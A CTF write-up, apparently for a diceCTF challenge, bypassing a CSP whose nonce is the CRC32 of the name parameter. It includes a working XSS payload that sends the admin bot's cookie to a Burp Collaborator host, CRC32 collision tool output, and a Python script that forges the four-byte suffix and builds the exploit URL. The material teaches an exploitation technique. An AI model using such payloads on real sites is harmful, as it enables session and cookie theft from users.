Tags: csp-bypass crc32 csp xss 

Rating: 5.0

The source code of the application was the following:

<h1>Hello, !</h1>
<h3>Enter your name:</h3>
<form method="GET">
<input type="text" placeholder="name" name="name" />
<input type="submit" />
</form>

The CSP nonce is derived from the CRC32 of the name GET parameter, so a script injected through name only executes if its nonce attribute equals the CRC32 of the name itself. To trigger the XSS we therefore need a payload that contains, as its nonce, the very CRC32 value the payload will hash to.

The payload I started with was the following:
<script nonce="f4dbdf21">document.location="https://dn4omcrpw9pp7dzp0nbqrm26fxlo9ex3.oastify.com?"+document.cookie</script>

If this runs on the admin bot, it will send the bot's cookie to our server (Burp Collaborator in this case). What remains is to make the payload's CRC32 equal the nonce it already carries: we fix the nonce value first and then adjust the payload so that it hashes to exactly that value.

To do this I used the following tool: [https://github.com/bediger4000/crc32-file-collision-generator](https://github.com/bediger4000/crc32-file-collision-generator)

$ ./matchfile target.txt payload.txt
File to match has length 1, CRC32 value f4dbdf21
File to get to match has length 123, CRC32 value be257358
Bytes to match: d2f4aa26
26 aa f4 d2

The target.txt just had a 0 in it (CRC32 hash: f4dbdf21), which is why the payload uses f4dbdf21 as its nonce; the tool only cares about the CRC32 of the target file, so any file with the wanted hash would do. The payload.txt had the payload text you saw earlier.
To make the payload produce the target CRC32 hash we just have to append the four bytes the tool generated (26 aa f4 d2) to the end of it. They land after the closing </script> tag, where the HTML parser treats them as stray text, so they do not interfere with the script element.

Now we send the request with the payload in the name parameter and the four bytes URL-encoded at the end (26 aa f4 d2 becomes %26%AA%F4%D2). The encoding is not optional: 0x26 is the character &, which would otherwise terminate the name parameter in the query string.

Because the name now hashes to f4dbdf21, the nonce in our script tag matches the one the CSP expects, the CSP is bypassed and the XSS fires.
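As an added example (this is not the challenge's code and not bediger4000's tool), the following Python reimplements the four-byte CRC32 fix-up from scratch, builds the name parameter around a chosen nonce, and checks with zlib.crc32 that the finished name hashes to the nonce it carries. It assumes, as the writeup implies but does not show, that the server sets the CSP nonce to crc32(name) rendered as eight lowercase hex digits; the Collaborator host is the one from the writeup, and the function names are my own.

```python
"""Forge a 4-byte suffix so that CRC32(payload + suffix) equals a chosen value.

Added example, not the challenge's code and not bediger4000's matchfile.
Assumed (not shown on the page): the server computes the CSP nonce as
crc32(name) rendered as 8 lowercase hex digits.
"""
import zlib
from urllib.parse import quote

POLY = 0xEDB88320  # reflected CRC-32 polynomial used by zlib and PHP crc32()

# Standard 256-entry reflected CRC-32 table.
TABLE = []
for i in range(256):
    c = i
    for _ in range(8):
        c = (c >> 1) ^ POLY if c & 1 else c >> 1
    TABLE.append(c)

# The top bytes of the table entries are all distinct, so a table index can be
# recovered from the top byte of a register value. That is what makes a
# single-step inversion, and hence the 4-byte fix-up, unambiguous.
TOP_BYTE_TO_INDEX = {entry >> 24: i for i, entry in enumerate(TABLE)}
assert len(TOP_BYTE_TO_INDEX) == 256


def crc_step(state, byte):
    """Advance the CRC register by one input byte (zlib's update rule)."""
    return TABLE[(state ^ byte) & 0xFF] ^ (state >> 8)


def crc_unstep_zero(state):
    """Undo crc_step(state, 0): the top byte of `state` identifies the table index."""
    idx = TOP_BYTE_TO_INDEX[state >> 24]
    return ((state ^ TABLE[idx]) << 8) | idx


def crc32_suffix(data: bytes, target: int) -> bytes:
    """Return 4 bytes s such that zlib.crc32(data + s) == target.

    Feeding bytes s0..s3 into the register is the same as XORing the 32-bit
    value s0 | s1<<8 | s2<<16 | s3<<24 into it and then feeding four zero
    bytes, so the problem reduces to running the register backwards through
    four zero bytes and XORing out the register state left by `data`.
    """
    reg = zlib.crc32(data) ^ 0xFFFFFFFF   # register after `data` (undo final XOR)
    want = target ^ 0xFFFFFFFF            # register needed after the suffix
    for _ in range(4):
        want = crc_unstep_zero(want)
    return ((want ^ reg) & 0xFFFFFFFF).to_bytes(4, "little")


def crc32_nonce(name: bytes) -> str:
    """Assumed server behaviour: nonce = crc32(name) as 8 lowercase hex digits."""
    return "%08x" % zlib.crc32(name)


def forge_name(collaborator_host: str, nonce: str) -> bytes:
    """Build a name whose crc32 equals the nonce its own <script> tag claims.

    The four fix-up bytes go after </script>, where the HTML parser treats
    them as stray text, so they cannot break the script element.
    """
    assert len(nonce) == 8, "nonce must be 8 hex digits"
    payload = (
        f'<script nonce="{nonce}">document.location="https://{collaborator_host}?"'
        '+document.cookie</script>'
    ).encode()
    return payload + crc32_suffix(payload, int(nonce, 16))


def exploit_url(collaborator_host: str, nonce: str = "f4dbdf21") -> str:
    """Percent-encoded query for the GET form; default nonce is crc32(b"0")."""
    return "/?name=" + quote(forge_name(collaborator_host, nonce), safe="")


if __name__ == "__main__":
    host = "dn4omcrpw9pp7dzp0nbqrm26fxlo9ex3.oastify.com"  # host from the writeup
    name = forge_name(host, "f4dbdf21")
    print("suffix:", name[-4:].hex(), "crc32 of name:", crc32_nonce(name))
    print(exploit_url(host))
```

For a fixed payload and target the four-byte map is a bijection on 32-bit values, so the suffix is unique and must agree with whatever a correct tool prints for the same input. `quote(..., safe="")` percent-encodes everything, which matters for the suffix byte 0x26: sent raw it is the & that ends the name parameter.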

Sending this URL for the admin bot to open makes the bot request our Collaborator host with its cookie in the query string. The cookie holds the flag, so the hit logged by Collaborator is:
GET /?flag=diceCTF{h0pe_that_d1dnt_take_too_l0ng} HTTP/1.1

Original writeup (https://youtu.be/7077pH14-kE).